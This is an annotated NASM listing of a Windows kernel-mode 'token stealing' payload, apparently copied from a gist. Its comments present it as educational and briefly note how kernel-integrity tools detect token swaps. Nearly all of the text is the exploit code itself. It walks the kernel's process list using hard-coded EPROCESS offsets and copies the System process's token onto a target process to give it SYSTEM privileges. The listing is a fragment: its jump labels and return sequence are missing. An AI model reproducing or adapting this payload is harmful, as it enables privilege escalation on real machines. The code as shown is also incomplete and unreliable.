;-----------------------------------------------------------------------
; Windows kernel-mode payload fragment (NASM, Intel syntax, 64-bit), as
; posted to the gist.  Educational / defender summary:
;   1. Starting from the current thread's owning process, walk the
;      kernel's process list and find the process whose PID matches the
;      value patched in at 0x41414141 (the gist calls it the cmd.exe
;      process).
;   2. Walk the list again to find PID 4 (the System process).
;   3. Copy System's Token pointer over the target process's Token
;      pointer -- the classic "token stealing" privilege-escalation step.
; Every structure offset below is hard-coded for one particular Windows
; build; the gist does not state which build, so treat them as version-
; specific (this is also why such payloads break across updates).
; Defensive relevance: token-pointer swaps leave a process whose
; EPROCESS.Token no longer matches the token it was created with, which
; is the kind of invariant kernel-integrity and forensic tooling
; commonly checks.  The listing is a fragment: it ends with a comment
; where the caller-specific return sequence is expected, and the labels
; named by its jumps are not part of the visible text.
;-----------------------------------------------------------------------
[BITS 64]
; Preserve the registers the payload touches so the interrupted kernel
; context can be restored afterwards.  rsi/rdi are saved but never
; written below.
push rax
push rbx
push rcx
push rsi
push rdi
; rax = current thread, read via the gs-based per-processor block.
mov rax, [gs:0x180 + 0x8] ; Get 'CurrentThread' from KPRCB
; rax = the process that owns the current thread (an EPROCESS pointer).
mov rax, [rax + 0x220] ; Get 'Process' property from current thread
; The field at +0x2e0 is the PID (the same field is compared against 4
; below).  0x41414141 is a placeholder the exploit overwrites with the
; target process's PID before use.
cmp dword [rax + 0x2e0], 0x41414141 ; Search for 'cmd.exe' process ('AAAA' replaced by exploit)
je found_cmd_process
; Advance to the next process: follow the list link stored at +0x2e8,
; then subtract the link's offset to get back to the start of the
; containing structure (CONTAINING_RECORD idiom).
mov rax, [rax + 0x2e8] ; If not found, go to next process
sub rax, 0x2e8
jmp next_process
; rbx now holds the target process; rax is reused for the second walk.
mov rbx, rax ; Save our cmd.exe EPROCESS for later
cmp dword [rax + 0x2e0], 0x00000004 ; Search for PID 4 (System process)
je found_system_process
; Same list-walk step as above, this time looking for PID 4.
mov rax, [rax + 0x2e8]
sub rax, 0x2e8
jmp find_system_process
; The privilege-escalation step: copy the System process's Token
; pointer (field at +0x358) into the target process's Token field.
mov rcx, [rax + 0x358] ; Take TOKEN from System process
mov [rbx+0x358], rcx ; And copy it to the cmd.exe process
; Restore the saved registers in reverse order.
pop rdi
pop rsi
pop rcx
pop rbx
pop rax
; return goes here